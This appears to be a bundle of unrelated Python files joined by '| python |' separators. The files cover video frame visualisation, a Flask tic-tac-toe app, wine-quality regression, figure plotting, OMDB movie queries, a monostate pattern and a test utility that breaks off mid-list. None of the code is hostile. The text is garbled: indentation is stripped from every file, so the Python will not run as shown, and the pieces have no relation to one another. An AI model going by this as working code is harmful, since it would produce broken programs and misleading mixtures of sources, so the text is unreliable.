sid = 11 if len(argv) <= 1 else int(argv[1])
from random import *
seed(sid)
for cas in range(int(input())):
input()
m = {}
for i, v in enumerate(map(int, input().split())): m.setdefault(v, []).append(i)
b = [v for i, v in sorted((choice(l), v) for v, l in m.items())]
print(len(b))
print(*b)
| python |
#
# Project FrameVis - Video Frame Visualizer Script
# @author David Madison
# @link github.com/dmadison/FrameVis
# @version v1.0.1
# @license MIT - Copyright (c) 2019 David Madison
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import cv2
import numpy as np
import argparse
from enum import Enum, auto
import time
class FrameVis:
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
"""
default_frame_height = None # auto, or in pixels
default_frame_width = None # auto, or in pixels
default_concat_size = 1 # size of concatenated frame if automatically calculated, in pixels
default_direction = "horizontal" # left to right
def visualize(self, source, nframes, height=default_frame_height, width=default_frame_width, \
direction=default_direction, trim=False, quiet=True):
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to process from the video
height (int): height of each frame, in pixels
width (int): width of each frame, in pixels
direction (str): direction to concatenate frames ("horizontal" or "vertical")
quiet (bool): suppress console messages
Returns:
visualization image as numpy array
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
if not quiet:
print("") # create space from script call line
# calculate keyframe interval
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nframes, int) or nframes < 1:
raise ValueError("Number of frames must be a positive integer")
elif nframes > video_total_frames:
raise ValueError("Requested frame count larger than total available ({})".format(video_total_frames))
keyframe_interval = video_total_frames / nframes # calculate number of frames between captures
# grab frame for dimension calculations
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
# calculate letterbox / pillarbox trimming, if specified
matte_type = 0
if trim == True:
if not quiet:
print("Trimming enabled, checking matting... ", end="", flush=True)
# 10 frame samples, seen as matted if an axis has all color channels at 3 / 255 or lower (avg)
success, cropping_bounds = MatteTrimmer.determine_video_bounds(source, 10, 3)
matte_type = 0
if success: # only calculate cropping if bounds are valid
crop_width = cropping_bounds[1][0] - cropping_bounds[0][0] + 1
crop_height = cropping_bounds[1][1] - cropping_bounds[0][1] + 1
if crop_height != image.shape[0]: # letterboxing
matte_type += 1
if crop_width != image.shape[1]: # pillarboxing
matte_type +=2
if not quiet:
if matte_type == 0:
print("no matting detected")
elif matte_type == 1:
print("letterboxing detected, cropping {} px from the top and bottom".format(int((image.shape[0] - crop_height) / 2)))
elif matte_type == 2:
print("pillarboxing detected, trimming {} px from the sides".format(int((image.shape[1] - crop_width) / 2)))
elif matte_type == 3:
print("multiple matting detected - cropping ({}, {}) to ({}, {})".format(image.shape[1], image.shape[0], crop_width, crop_height))
# calculate height
if height is None: # auto-calculate
if direction == "horizontal": # non-concat, use video size
if matte_type & 1 == 1: # letterboxing present
height = crop_height
else:
height = image.shape[0] # save frame height
else: # concat, use default value
height = FrameVis.default_concat_size
elif not isinstance(height, int) or height < 1:
raise ValueError("Frame height must be a positive integer")
# calculate width
if width is None: # auto-calculate
if direction == "vertical": # non-concat, use video size
if matte_type & 2 == 2: # pillarboxing present
width = crop_width
else:
width = image.shape[1] # save frame width
else: # concat, use default value
width = FrameVis.default_concat_size
elif not isinstance(width, int) or width < 1:
raise ValueError("Frame width must be a positive integer")
# assign direction function and calculate output size
if direction == "horizontal":
concatenate = cv2.hconcat
output_width = width * nframes
output_height = height
elif direction == "vertical":
concatenate = cv2.vconcat
output_width = width
output_height = height * nframes
else:
raise ValueError("Invalid direction specified")
if not quiet:
aspect_ratio = output_width / output_height
print("Visualizing \"{}\" - {} by {} ({:.2f}), from {} frames (every {:.2f} seconds)"\
.format(source, output_width, output_height, aspect_ratio, nframes, FrameVis.interval_from_nframes(source, nframes)))
# set up for the frame processing loop
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
finished_frames = 0 # counter for number of processed frames
output_image = None
progress = ProgressBar("Processing:")
while True:
if finished_frames == nframes:
break # done!
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file (frame {} out of {})".format(int(next_keyframe), video_total_frames))
if matte_type != 0: # crop out matting, if specified and matting is present
image = MatteTrimmer.crop_image(image, cropping_bounds)
image = cv2.resize(image, (width, height)) # resize to output size
# save to output image
if output_image is None:
output_image = image
else:
output_image = concatenate([output_image, image]) # concatenate horizontally from left -> right
finished_frames += 1
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
if not quiet:
progress.write(finished_frames / nframes) # print progress bar to the console
video.release() # close video capture
return output_image
@staticmethod
def average_image(image, direction):
"""
Averages the colors in an axis across an entire image
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction to average frames ("horizontal" or "vertical")
Returns:
image, with pixel data averaged along provided axis
"""
height, width, depth = image.shape
if direction == "horizontal":
scale_height = 1
scale_width = width
elif direction == "vertical":
scale_height = height
scale_width = 1
else:
raise ValueError("Invalid direction specified")
image = cv2.resize(image, (scale_width, scale_height)) # scale down to '1', averaging values
image = cv2.resize(image, (width, height)) # scale back up to size
return image
@staticmethod
def motion_blur(image, direction, blur_amount):
"""
Blurs the pixels in a given axis across an entire image.
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction of stacked images for blurring ("horizontal" or "vertical")
blur_amount (int): how much to blur the image, as the convolution kernel size
Returns:
image, with pixel data blurred along provided axis
"""
kernel = np.zeros((blur_amount, blur_amount)) # create convolution kernel
# fill group with '1's
if direction == "horizontal":
kernel[:, int((blur_amount - 1)/2)] = np.ones(blur_amount) # fill center column (blurring vertically for horizontal concat)
elif direction == "vertical":
kernel[int((blur_amount - 1)/2), :] = np.ones(blur_amount) # fill center row (blurring horizontally for vertical concat)
else:
raise ValueError("Invalid direction specified")
kernel /= blur_amount # normalize kernel matrix
return cv2.filter2D(image, -1, kernel) # filter using kernel with same depth as source
@staticmethod
def nframes_from_interval(source, interval):
"""
Calculates the number of frames available in a video file for a given capture interval
Parameters:
source (str): filepath to source video file
interval (float): capture frame every i seconds
Returns:
number of frames per time interval (int)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
duration = frame_count / fps # duration of the video, in seconds
video.release() # close video capture
return int(round(duration / interval)) # number of frames per interval
@staticmethod
def interval_from_nframes(source, nframes):
"""
Calculates the capture interval, in seconds, for a video file given the
number of frames to capture
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to capture from the video file
Returns:
time interval (seconds) between frame captures (float)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
keyframe_interval = frame_count / nframes # calculate number of frames between captures
video.release() # close video capture
return keyframe_interval / fps # seconds between captures
class MatteTrimmer:
"""
Functions for finding and removing black mattes around video frames
"""
@staticmethod
def find_matrix_edges(matrix, threshold):
"""
Finds the start and end points of a 1D array above a given threshold
Parameters:
matrix (arr, 1.x): 1D array of data to check
threshold (value): valid data is above this trigger level
Returns:
tuple with the array indices of data bounds, start and end
"""
if not isinstance(matrix, (list, tuple, np.ndarray)) or len(matrix.shape) != 1:
raise ValueError("Provided matrix is not the right size (must be 1D)")
data_start = None
data_end = None
for value_id, value in enumerate(matrix):
if value > threshold:
if data_start is None:
data_start = value_id
data_end = value_id
return (data_start, data_end)
@staticmethod
def find_larger_bound(first, second):
"""
Takes two sets of diagonal rectangular boundary coordinates and determines
the set of rectangular boundary coordinates that contains both
Parameters:
first (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
second (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Where for both arrays the first coordinate is in the top left-hand corner,
and the second coordinate is in the bottom right-hand corner.
Returns:
numpy coordinate matrix containing both of the provided boundaries
"""
left_edge = first[0][0] if first[0][0] <= second[0][0] else second[0][0]
right_edge = first[1][0] if first[1][0] >= second[1][0] else second[1][0]
top_edge = first[0][1] if first[0][1] <= second[0][1] else second[0][1]
bottom_edge = first[1][1] if first[1][1] >= second[1][1] else second[1][1]
return np.array([[left_edge, top_edge], [right_edge, bottom_edge]])
@staticmethod
def valid_bounds(bounds):
"""
Checks if the frame bounds are a valid format
Parameters:
bounds (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
True or False
"""
for x, x_coordinate in enumerate(bounds):
for y, y_coordinate in enumerate(bounds):
if bounds[x][y] is None:
return False # not a number
if bounds[0][0] > bounds[1][0] or \
bounds[0][1] > bounds[1][1]:
return False # left > right or top > bottom
return True
@staticmethod
def determine_image_bounds(image, threshold):
"""
Determines if there are any hard mattes (black bars) surrounding
an image on either the top (letterboxing) or the sides (pillarboxing)
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
image_bounds: numpy coordinate matrix with the two opposite corners of the
image bounds, in the form [(X,Y), (X,Y)]
"""
height, width, depth = image.shape
# check for letterboxing
horizontal_sums = np.sum(image, axis=(1,2)) # sum all color channels across all rows
hthreshold = (threshold * width * depth) # must be below every pixel having a value of "threshold" in every channel
vertical_edges = MatteTrimmer.find_matrix_edges(horizontal_sums, hthreshold)
# check for pillarboxing
vertical_sums = np.sum(image, axis=(0,2)) # sum all color channels across all columns
vthreshold = (threshold * height * depth) # must be below every pixel having a value of "threshold" in every channel
horizontal_edges = MatteTrimmer.find_matrix_edges(vertical_sums, vthreshold)
image_bounds = np.array([[horizontal_edges[0], vertical_edges[0]], [horizontal_edges[1], vertical_edges[1]]])
return MatteTrimmer.valid_bounds(image_bounds), image_bounds
@staticmethod
def determine_video_bounds(source, nsamples, threshold):
"""
Determines if any matting exists in a video source
Parameters:
source (str): filepath to source video file
nsamples (int): number of frames from the video to determine bounds,
evenly spaced throughout the video
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
video_bounds: numpy coordinate matrix with the two opposite corners of the
video bounds, in the form [(X,Y), (X,Y)]
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nsamples, int) or nsamples < 1:
raise ValueError("Number of samples must be a positive integer")
keyframe_interval = video_total_frames / nsamples # calculate number of frames between captures
# open video to make results consistent with visualizer
# (this also GREATLY increases the read speed? no idea why)
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
video_bounds = None
for frame_number in range(nsamples):
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file")
success, frame_bounds = MatteTrimmer.determine_image_bounds(image, threshold)
if not success:
continue # don't compare bounds, frame bounds are invalid
video_bounds = frame_bounds if video_bounds is None else MatteTrimmer.find_larger_bound(video_bounds, frame_bounds)
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
video.release() # close video capture
return MatteTrimmer.valid_bounds(video_bounds), video_bounds
@staticmethod
def crop_image(image, bounds):
"""
Crops a provided image by the coordinate bounds pair provided.
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
second (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
image as 3-dimensional numpy array, cropped to the coordinate bounds
"""
return image[bounds[0][1]:bounds[1][1], bounds[0][0]:bounds[1][0]]
class ProgressBar:
"""
Generates a progress bar for the console output
Args:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
print_elapsed (bool): option to print time elapsed or not
Attributes:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
print_time (bool): option to print time elapsed or not
print_elapsed (int): starting time for the progress bar, in unix seconds
"""
def __init__(self, pre="", bar_length=25, print_elapsed=True):
pre = (pre + '\t') if pre != "" else pre # append separator if string present
self.pre = pre
self.bar_length = bar_length
self.print_elapsed = print_elapsed
if self.print_elapsed:
self.__start_time = time.time() # store start time as unix
def write(self, percent):
"""Prints a progress bar to the console based on the input percentage (float)."""
term_char = '\r' if percent < 1.0 else '\n' # rewrite the line unless finished
filled_size = int(round(self.bar_length * percent)) # number of 'filled' characters in the bar
progress_bar = "#" * filled_size + " " * (self.bar_length - filled_size) # progress bar characters, as a string
time_string = ""
if self.print_elapsed:
time_elapsed = time.time() - self.__start_time
time_string = "\tTime Elapsed: {}".format(time.strftime("%H:%M:%S", time.gmtime(time_elapsed)))
print("{}[{}]\t{:.2%}{}".format(self.pre, progress_bar, percent, time_string), end=term_char, flush=True)
def main():
parser = argparse.ArgumentParser(description="video frame visualizer and movie barcode generator", add_help=False) # removing help so I can use '-h' for height
parser.add_argument("source", help="file path for the video file to be visualized", type=str)
parser.add_argument("destination", help="file path output for the final image", type=str)
parser.add_argument("-n", "--nframes", help="the number of frames in the visualization", type=int)
parser.add_argument("-i", "--interval", help="interval between frames for the visualization", type=float)
parser.add_argument("-h", "--height", help="the height of each frame, in pixels", type=int, default=FrameVis.default_frame_height)
parser.add_argument("-w", "--width", help="the output width of each frame, in pixels", type=int, default=FrameVis.default_frame_width)
parser.add_argument("-d", "--direction", help="direction to concatenate frames, horizontal or vertical", type=str, \
choices=["horizontal", "vertical"], default=FrameVis.default_direction)
parser.add_argument("-t", "--trim", help="detect and trim any hard matting (letterboxing or pillarboxing)", action='store_true', default=False)
parser.add_argument("-a", "--average", help="average colors for each frame", action='store_true', default=False)
parser.add_argument("-b", "--blur", help="apply motion blur to the frames (kernel size)", type=int, nargs='?', const=100, default=0)
parser.add_argument("-q", "--quiet", help="mute console outputs", action='store_true', default=False)
parser.add_argument("--help", action="help", help="show this help message and exit")
args = parser.parse_args()
# check number of frames arguments
if args.nframes is None:
if args.interval is not None: # calculate nframes from interval
args.nframes = FrameVis.nframes_from_interval(args.source, args.interval)
else:
parser.error("You must provide either an --(n)frames or --(i)nterval argument")
# check postprocessing arguments
if args.average is True and args.blur != 0:
parser.error("Cannot (a)verage and (b)lur, you must choose one or the other")
fv = FrameVis()
output_image = fv.visualize(args.source, args.nframes, height=args.height, width=args.width, \
direction=args.direction, trim=args.trim, quiet=args.quiet)
# postprocess
if args.average or args.blur != 0:
if args.average:
if not args.quiet:
print("Averaging frame colors... ", end="", flush=True)
output_image = fv.average_image(output_image, args.direction)
if args.blur != 0:
if not args.quiet:
print("Adding motion blur to final frame... ", end="", flush=True)
output_image = fv.motion_blur(output_image, args.direction, args.blur)
if not args.quiet:
print("done")
cv2.imwrite(args.destination, output_image) # save visualization to file
if not args.quiet:
print("Visualization saved to {}".format(args.destination))
if __name__ == "__main__":
main()
| python |
import os
import pickle
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from task_dyva.utils import save_figure
from task_dyva.visualization import PlotModelLatents
class FigureS6():
"""Analysis methods and plotting routines to reproduce
Figure S6 from the manuscript (example latent state trajectories).
"""
analysis_dir = 'model_analysis'
stats_fn = 'holdout_outputs_01SD.pkl'
fp_fn = 'fixed_points.pkl'
age_bins = ['ages20to29', 'ages30to39', 'ages40to49',
'ages50to59', 'ages60to69', 'ages70to79', 'ages80to89']
plot_age_bins = ['ages20to29', 'ages50to59', 'ages80to89']
plot_titles = ['Ages 20 to 29', 'Ages 50 to 59', 'Ages 80 to 89']
figsize = (9, 13)
figdpi = 300
def __init__(self, model_dir, save_dir, metadata):
self.model_dir = model_dir
self.save_dir = save_dir
self.expts = metadata['name']
self.age_bins = metadata['age_range']
self.sc_status = metadata['switch_cost_type']
# Containers for summary stats
self.all_stats = {ab: [] for ab in self.age_bins}
self.all_fps = {ab: [] for ab in self.age_bins}
def make_figure(self):
print('Making Figure S6...')
self._run_preprocessing()
fig = self._plot_figure()
save_figure(fig, self.save_dir, 'FigS6')
print('')
def _run_preprocessing(self):
for expt_str, ab, sc in zip(self.expts,
self.age_bins,
self.sc_status):
# Skip sc- models
if sc == 'sc-':
continue
# Load stats from the holdout data
stats_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.stats_fn)
with open(stats_path, 'rb') as path:
expt_stats = pickle.load(path)
# Load fixed points
fp_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.fp_fn)
with open(fp_path, 'rb') as path:
fps = pickle.load(path)
self.all_stats[ab].append(expt_stats)
self.all_fps[ab].append(fps)
def _plot_figure(self):
fig = plt.figure(figsize=self.figsize, dpi=self.figdpi)
nrows = 5
t_post = 1200
elev, azim = 30, 60
for ab_ind, ab in enumerate(self.plot_age_bins):
this_stats = self.all_stats[ab]
this_fps = self.all_fps[ab]
this_means = np.array([s.summary_stats['u_mean_rt']
for s in this_stats])
sort_inds = np.argsort(this_means)
plot_inds = np.arange(0, len(sort_inds), 20 // nrows)
for ax_ind, p in enumerate(plot_inds):
subplot_ind = ax_ind * 3 + ab_ind + 1
ax = fig.add_subplot(nrows, 3, subplot_ind, projection='3d')
plot_stats = this_stats[sort_inds[p]]
plot_fps = this_fps[sort_inds[p]]
# Plot
if ax_ind == 0 and ab_ind == 0:
kwargs = {'annotate': True}
else:
kwargs = {'annotate': False}
plotter = PlotModelLatents(plot_stats, post_on_dur=t_post,
fixed_points=plot_fps, plot_pre_onset=False)
ax = plotter.plot_main_conditions(ax, elev=elev, azim=azim,
**kwargs)
if ax_ind == 0:
ax.set_title(self.plot_titles[ab_ind])
return fig
| python |
import random
from flask import render_template, redirect, flash, url_for, request, jsonify
from flask_login import login_user, logout_user, current_user, login_required
from sqlalchemy import desc
from app import app, db, login_manager, forms
from app.models import User, Game, GameMove
from app.decorators import not_in_game
@app.route("/")
@login_required
@not_in_game
def index():
games_in_wait = Game.query.filter_by(state=Game.game_state['waiting_for_players']).limit(5)
games_in_progress = Game.query.filter_by(state=Game.game_state['in_progress']).limit(5)
return render_template('index.html', games_in_progress=games_in_progress, games_in_wait=games_in_wait)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
if request.method == 'POST':
form = forms.LoginForm(request.form)
else:
form = forms.LoginForm()
if form.validate_on_submit():
user = User.get_authenticated_user(form.username.data, form.password.data)
if user:
login_user(user)
return redirect(url_for('index'))
flash('Can not find this combination of username and password')
return render_template('login.html', login_form=form)
@app.route("/logout", methods=['POST'])
def logout():
logout_user()
return redirect(url_for('index'))
@app.route("/register", methods=['GET', 'POST'])
def register():
if request.method == 'POST':
form = forms.RegisterForm(request.form)
else:
form = forms.RegisterForm()
if form.validate_on_submit():
user = User(form.username.data, form.password.data, form.email.data)
db.session.add(user)
db.session.commit()
login_user(user)
# Redirect to homepage, if user is successfully authenticated
if current_user.is_authenticated:
flash('Welcome to the Tic-Tac-Toe!', 'success')
return redirect(url_for('index'))
return render_template('register.html', register_form=form)
@app.route("/game/new", methods=['GET', 'POST'])
@login_required
@not_in_game
def new_game():
if request.method == 'POST':
form = forms.NewGameForm(request.form)
else:
form = forms.NewGameForm()
if form.validate_on_submit():
# generate random players order in game
user_order = random.choice([1, 2])
if user_order == 1:
game = Game(field_size=form.size.data, win_length=form.rule.data, player1=current_user)
else:
game = Game(field_size=form.size.data, win_length=form.rule.data, player2=current_user)
db.session.add(game)
db.session.commit()
return redirect(url_for('show_game', game_id=game.id))
return render_template('new_game.html', new_game_form=form)
@app.route("/game/join/<int:game_id>", methods=['POST'])
@login_required
def join_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id and game.player2:
# redirect back to the game if it's full
flash('Current game is already in progress')
return redirect(url_for('show_game', game_id=game_id))
# check available player position in game
if game.player1_id is None:
game.player1 = current_user
else:
game.player2 = current_user
game.state = Game.game_state['in_progress']
db.session.commit()
return redirect(url_for('show_game', game_id=game_id))
@app.route("/game/flee", methods=['POST'])
@login_required
def flee_game():
game = current_user.current_game
# if there is no game to flee, redirect to homepage
if not game:
flash('There is no game to flee')
return redirect(url_for('index'))
game.state = Game.game_state['finished']
if game.player1_id == current_user.id:
opponent = game.player2
result = Game.game_result['player_two_win']
else:
opponent = game.player1
result = Game.game_result['player_one_win']
# if there was a second player in a game, let him win
if opponent:
game.result = result
db.session.commit()
return redirect(url_for('index'))
@app.route("/game/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id == current_user.id:
player_number = 1
elif game.player2_id == current_user.id:
player_number = 2
else:
# Spectator
player_number = current_user.id + 100 # simple unique spectator id
return render_template('game.html', game=game, player_number=player_number)
@app.route("/profile/<int:user_id>", methods=['GET'])
@login_required
@not_in_game
def user_profile(user_id):
last_games_limit = 25
finished = Game.game_state['finished']
user = User.get_user_by_id(user_id)
games = user.games.filter(Game.state == finished)\
.filter(Game.player1_id)\
.filter(Game.player2_id)\
.order_by(desc(Game.id)).limit(last_games_limit)
return render_template('profile.html', games=games, user=user)
@app.route("/gamearchive/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_archived_game(game_id):
game = Game.query.get_or_404(game_id)
player_number = current_user.id + 100 # unique spectator id
template = 'archive_game.html'
if game.state != Game.game_state['finished']:
template = 'game.html'
return render_template(template, game=game, player_number=player_number)
@app.route("/game/<int:game_id>/json", methods=['GET'])
def get_game_data(game_id):
game = Game.query.get_or_404(game_id)
players = []
for index, player_name in enumerate((game.player1.username, game.player2.username)):
player = {
'name': player_name,
'player_number': index + 1
}
players.append(player)
moves = list(map(GameMove.dic, game.moves))
return jsonify(moves=moves, players=players)
@login_manager.user_loader
def load_user(userid):
return User.get_user_by_id(userid)
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 15:49:57 2018
@author: pranavjain
This model predicts the quality of the red wine. Also, an optimal model is built using Backward Elimination.
Required Data to predict
Fixed acidity
Volatile acidity
Citric acid
Residual sugar
Chlorides
Free sulphur dioxide
Total sulphur dioxide
Density
pH
Sulphates
Alcohol
"""
# Importing the libraries
import numpy as np
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('winequality-red.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 11].values
# Deprecation warnings call for reshaping of single feature arrays with reshape(-1,1)
y = y.reshape(-1,1)
# avoid DataConversionError
y = y.astype(float)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)
y_test = sc_y.transform(y_test)"""
# Fitting Multiple Linear Regression to the Training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predicting the Test set results
y_pred = regressor.predict(X_test)
# Building the optimal model using Backward Elimination
# consider p-value < 0.05
import statsmodels.formula.api as sm
X = np.append(arr = np.ones((1599, 1)).astype(float), values = X, axis = 1)
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'density'
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'fixed acidity'
X_opt = X[:, [0, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'residual sugar'
X_opt = X[:, [0, 2, 3, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'critic acid'
X_opt = X[:, [0, 2, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'free sulphur dioxide'
X_opt = X[:, [0, 2, 5, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# hence the optimal model is now ready
| python |
from mqtt_panel.web.component import Component
class Modal(Component):
def __init__(self):
super().__init__(4)
def _body(self, fh):
self._write_render(fh, '''\
<div id="modal" class="d-none"></div>
''', indent=self._indent)
| python |
from gym_gazebo2.envs.MARA.mara import MARAEnv
from gym_gazebo2.envs.MARA.mara_random import MARARandEnv
from gym_gazebo2.envs.MARA.mara_real import MARARealEnv
from gym_gazebo2.envs.MARA.mara_camera import MARACameraEnv
from gym_gazebo2.envs.MARA.mara_orient import MARAOrientEnv
from gym_gazebo2.envs.MARA.mara_collision import MARACollisionEnv
from gym_gazebo2.envs.MARA.mara_collision_orient import MARACollisionOrientEnv
| python |
# Dependencies
import requests as req
from config import api_key
url = f"http://www.omdbapi.com/?apikey={api_key}&t="
# Who was the director of the movie Aliens?
movie = req.get(url + "Aliens").json()
print("The director of Aliens was " + movie["Director"] + ".")
# What was the movie Gladiator rated?
movie = req.get(url + "Gladiator").json()
print("The rating of Gladiator was " + movie["Rated"] + ".")
# What year was 50 First Dates released?
movie = req.get(url + "50 First Dates").json()
print("The movie 50 First Dates was released in " + movie["Year"] + ".")
# Who wrote Moana?
movie = req.get(url + "Moana").json()
print("Moana was written by " + movie["Writer"] + ".")
# What was the plot of the movie Sing?
movie = req.get(url + "Sing").json()
print("The plot of Sing was: '" + movie["Plot"] + "'.")
# BONUS: Complete this activity with a loop.
| python |
"""Clean Code in Python - Chapter 9: Common Design Patterns
> Monostate Pattern
"""
from log import logger
class SharedAttribute:
def __init__(self, initial_value=None):
self.value = initial_value
self._name = None
def __get__(self, instance, owner):
if instance is None:
return self
if self.value is None:
raise AttributeError(f"{self._name} was never set")
return self.value
def __set__(self, instance, new_value):
self.value = new_value
def __set_name__(self, owner, name):
self._name = name
class GitFetcher:
current_tag = SharedAttribute()
current_branch = SharedAttribute()
def __init__(self, tag, branch=None):
self.current_tag = tag
self.current_branch = branch
def pull(self):
logger.info("pulling from %s", self.current_tag)
return self.current_tag
| python |
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
import mxnet as mx
from unittest.mock import Mock
import os
import numpy as np
import zipfile
import random
import glob
MXNET_MODEL_ZOO_PATH = 'http://data.mxnet.io/models/imagenet/'
class RepurposerTestUtils:
ERROR_INCORRECT_INPUT = 'Test case assumes incorrect input'
VALIDATE_REPURPOSE_METHOD_NAME = '_validate_before_repurpose'
VALIDATE_PREDICT_METHOD_NAME = '_validate_before_predict'
LAYER_FC1 = 'fc1'
LAYER_RELU = 'relu1'
LAYER_FC2 = 'fc2'
LAYER_SOFTMAX = 'softmax'
ALL_LAYERS = [LAYER_FC1, LAYER_RELU, LAYER_FC2, LAYER_SOFTMAX]
META_MODEL_REPURPOSER_MODEL_HANDLER_CLASS = 'xfer.meta_model_repurposer.ModelHandler'
MNIST_MODEL_PATH_PREFIX = 'tests/data/test_mnist_model'
@staticmethod
def create_mxnet_module():
# Define an mxnet Module with 2 layers
data = mx.sym.Variable('data')
fc1 = mx.sym.FullyConnected(data, name=RepurposerTestUtils.LAYER_FC1, num_hidden=64)
relu1 = mx.sym.Activation(fc1, name=RepurposerTestUtils.LAYER_RELU, act_type="relu")
fc2 = mx.sym.FullyConnected(relu1, name=RepurposerTestUtils.LAYER_FC2, num_hidden=5)
out = mx.sym.SoftmaxOutput(fc2, name=RepurposerTestUtils.LAYER_SOFTMAX)
return mx.mod.Module(out)
@staticmethod
def get_mock_model_handler_object():
mock_model_handler = Mock()
mock_model_handler.layer_names = RepurposerTestUtils.ALL_LAYERS
return mock_model_handler
@staticmethod
def get_image_iterator():
image_list = [[0, 'accordion/image_0001.jpg'], [0, 'accordion/image_0002.jpg'], [1, 'ant/image_0001.jpg'],
